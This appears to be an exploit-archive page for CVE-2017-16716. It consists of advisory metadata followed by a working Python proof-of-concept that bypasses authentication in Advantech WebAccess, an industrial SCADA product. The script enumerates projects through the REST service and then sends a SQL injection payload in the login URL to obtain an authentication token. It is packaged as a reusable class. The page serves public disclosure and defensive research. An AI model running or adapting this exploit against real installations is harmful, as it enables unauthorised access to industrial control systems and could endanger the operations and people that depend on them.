Advantech WebAccess 8.0-2015.08.16 SQL Injection

2018.01.31
Credit: Chris Lyne
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

#!/usr/bin/python2.7 # Exploit Title: Advantech WebAccess BWSCADARest Login Method SQL Injection Authentication Bypass Vulnerability # Date: 01-13-2018 # Exploit Author: Chris Lyne (@lynerc) # Vendor Homepage: www.advantech.com # Software Link: http://advcloudfiles.advantech.com/web/Download/webaccess/8.0/AdvantechWebAccessUSANode8.0_20150816.exe # Version: Advantech WebAccess 8.0-2015.08.16 # Tested on: Windows Server 2008 R2 Enterprise 64-bit # CVE : CVE-2017-16716 # See Also: http://zerodayinitiative.com/advisories/ZDI-18-065/ # Notes: # # There are two service interfaces: # 1) SOAP # 2) REST # # This PoC targets REST # # The web services did not work out of the box, and a new website/app was created in IIS for testing. # This issue was potentially due to the fact that testing was completed against a trial version. # PoC may need slight tweaks depending on configuration of the web service. # # Original vulnerability was reported for more recent software version. # # This WebAccessAuthBypass class can be imported :-) import sys, requests from xml.etree import ElementTree class WebAccessAuthBypass: def __init__(self, ip, port): self.ip = ip self.port = port self.base_url = "http://%s:%s/BWMobileService/BWScadaRest.svc/" % (ip, port) def convert_entities(self, s): return s.replace('>', '>').replace('<', '<') # convert html entities in response, for parsing def get_project_list(self): print 'Getting list of projects...' res = requests.get(self.base_url) projects = list() if res.status_code != 200: print 'Bad HTTP response...' else: if 'PROJECT' not in res.text: print 'No projects listed by service.' else: s = self.convert_entities(res.text) xml = ElementTree.fromstring(s) for project_list in xml: for project in project_list: name = project.get('NAME') if name is not None: projects.append(name) if len(projects) > 0: print 'Found the following projects: ' + str(projects) return projects else: return None # returns a token def login(self, project): # SQL Injection into the user parameter url = self.base_url + "Login/" + project + "/notadmin'%20or%20'x'%3D'x/nopass" # notadmin' or 'x'='x res = requests.get(url) token = None if res.status_code != 200: print 'Bad HTTP response...' else: if 'OK TOKEN' not in res.text: print 'No token returned by service.' else: s = self.convert_entities(res.text) xml = ElementTree.fromstring(s) if len(xml) > 0: token = xml[0].get('TOKEN') return token # token returned can be used for more transactions def get_token(self): project_list = self.get_project_list() project = project_list[0] # might as well pick the first project token = self.login(project_list[0]) return token if __name__ == "__main__": ip = 'targetip' port = 'port#' bypass = WebAccessAuthBypass(ip, port) token = bypass.get_token() if token is not None: print 'Successfully got an authentication token: ' + token else: print 'Unsuccessful.'


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top